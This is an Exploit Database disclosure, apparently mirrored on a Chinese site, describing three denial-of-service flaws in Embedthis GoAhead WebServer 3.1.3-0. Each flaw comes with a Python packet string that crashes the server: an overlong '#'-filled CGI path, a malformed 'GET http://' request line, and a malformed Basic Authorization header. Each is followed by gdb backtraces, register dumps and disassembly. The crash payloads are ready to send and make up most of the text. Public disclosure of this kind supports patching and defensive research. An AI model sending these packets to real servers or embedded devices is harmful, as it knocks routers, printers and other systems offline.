Embedthis Goahead WebServer 3.1.3-0 – Multiple Vulnerabilities

• Exploit Database
• 121 阅读

• 作者： Maksymilian Motyl
  日期： 2014-02-19
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/31761/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149

  # Title: Embedthis Goahead Webserver multiple DoS vulnerabilities. # Author: 0in (Maksymilian Motyl) # Date: 18.02.2014 # Version: 3.1.3-0 # Software Link: http://embedthis.com/products/goahead/ # Download: https://github.com/embedthis/goahead # Tested on: Linux x32 # Description: # "GoAhead is embedded in hundreds of millions of devices and applications like: printers, routers, switches, IP phones, mobile applications, data acquisition, # military applications and WIFI gateways." # .... Ok. # But I cannot confirm any vulnerability in products listed at http://embedthis.com/products/goahead/users.html   ----------------------------------------------- 1st vulnerability   ***************************************   #!/usr/bin/python   packet="GET /cgi-bin/test/a/c/?"+"#"*1024+".cgi/c.txt HTTP/1.1\r\n"\ "Host: 127.0.0.1\r\n"\ "User-Agent: BillyExploiter\r\n"\ "Accept: text/html\r\n"\ "Accept-Language: pl\r\n"\ "Accept-Encoding: gzip, deflate\r\n"\ "Connection: keep-alive"   ***************************************   Program received signal SIGABRT, Aborted. 0xb7772424 in __kernel_vsyscall () (gdb) bt #00xb7772424 in __kernel_vsyscall () #10xb757d941 in *__GI_raise (sig=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64 #20xb7580d72 in *__GI_abort () at abort.c:92 #30xb75b9e15 in __libc_message (do_abort=2, fmt=0xb7691e70 "*** glibc detected *** %s: %s: 0x%s ***\n") at ../sysdeps/unix/sysv/linux/libc_fatal.c:189 #40xb75c3f01 in malloc_printerr (action=<optimized out>, str=0x6 <Address 0x6 out of bounds>, ptr=0xb7765dad) at malloc.c:6283 #50xb75c517e in munmap_chunk (p=<optimized out>) at malloc.c:3540 #60xb7752d74 in termWebs (wp=wp@entry=0x8573240, reuse=reuse@entry=1) at src/http.c:457 #70xb775309c in reuseConn (wp=0x8573240) at src/http.c:520 #8complete (wp=wp@entry=0x8573240, reuse=reuse@entry=1) at src/http.c:575 #90xb7754571 in websPump (wp=wp@entry=0x8573240) at src/http.c:837 #10 0xb7755606 in readEvent (wp=0x8573240) at src/http.c:797 #11 socketEvent (wptr=0x8573240, mask=2, sid=<optimized out>) at src/http.c:735     *** glibc detected *** goahead: munmap_chunk(): invalid pointer: 0xb7765dad ***   (gdb) x/xw 0xb7765dad 0xb7765dad: 0x74746800 # "tth"   -----------------------------------------------   2nd vulnerability   ***************************************   #!/usr/bin/python packet="GET http:// HTTP/1.1\r\n"   # Same crash happens when: packet="GET http://dupa: HTTP/1.1\r\n"   ***************************************     Program received signal SIGSEGV, Segmentation fault. websDecodeUrl (decoded=decoded@entry=0xb7756253 "/", input=input@entry=0xb7756253 "/", len=<optimized out>, len@entry=-1) at src/http.c:2225 warning: Source file is more recent than executable. 2225 *op = *ip; (gdb) bt #0websDecodeUrl (decoded=decoded@entry=0xb7756253 "/", input=input@entry=0xb7756253 "/", len=<optimized out>, len@entry=-1) at src/http.c:2225 #10xb774248f in websUrlParse (url=0x83bf140 "http", url@entry=0x83cd58c "http://", pbuf=pbuf@entry=0xbfe6ce14, pprotocol=pprotocol@entry=0x0, phost=phost@entry=0xbfe6ce00, pport=pport@entry=0xbfe6ce0c, ppath=ppath@entry=0xbfe6ce08, pext=pext@entry=0xbfe6ce10, preference=preference@entry=0x0, pquery=pquery@entry=0xbfe6ce04) at src/http.c:3122 #20xb7745079 in parseFirstLine (wp=0x83bf240) at src/http.c:949 #3parseIncoming (wp=0x83bf240) at src/http.c:870   (gdb) disas $eip   0xb773fb28 <+72>: cmp$0x25,%dl 0xb773fb2b <+75>: je 0xb773fb70 <websDecodeUrl+144> => 0xb773fb2d <+77>: mov%dl,(%esi)   (gdb) info reg eax0x1 1 ecx0x13 19 edx0x2f 47 ebx0xb775e91c -1217009380 esp0xbfe6cd20 0xbfe6cd20 ebp0xb7756254 0xb7756254 esi0xb7756253 -1217043885 edi0xb7756253 -1217043885 eip0xb773fb2d 0xb773fb2d <websDecodeUrl+77>   (gdb) x/xw 0xb7756253 0xb7756253: 0x7473002f     -----------------------------------------------   3rd vulnerability   ***************************************   #!/usr/bin/python packet="GET http://127.0.0.1/auth/basic/ HTTP/1.1\r\n"\ "Host: 127.0.0.1\r\n"\ "Accept: text/html\r\n"\ "Accept-Language: pl\r\n"\ "Accept-Encoding: gzip, deflate\r\n"\ "Connection: keep-alive\r\n" "Authorization: Basic #\r\n" ***************************************   (gdb) bt #0strchr () at ../sysdeps/i386/strchr.S:127 #10xb770652a in parseBasicDetails (wp=0x8055240) at src/auth.c:717 #20xb7706c31 in websAuthenticate (wp=wp@entry=0x8055240) at src/auth.c:110 #30xb7717532 in websRouteRequest (wp=wp@entry=0x8055240) at src/route.c:85   (gdb) disas $eip 0xb758799a <+90>: lea0x0(%esi),%esi 0xb75879a0 <+96>: add$0x10,%eax => 0xb75879a3 <+99>: mov(%eax),%ecx   (gdb) info reg eax0x0 0 ecx0x3a3a 14906 edx0x3a3a3a3a 976894522 ebx0xb772a91c -1217222372 esp0xbfc71428 0xbfc71428 ebp0x8055240 0x8055240 esi0x8055240 134566464 edi0x0 0 eip0xb75879a3 0xb75879a3 <strchr+99>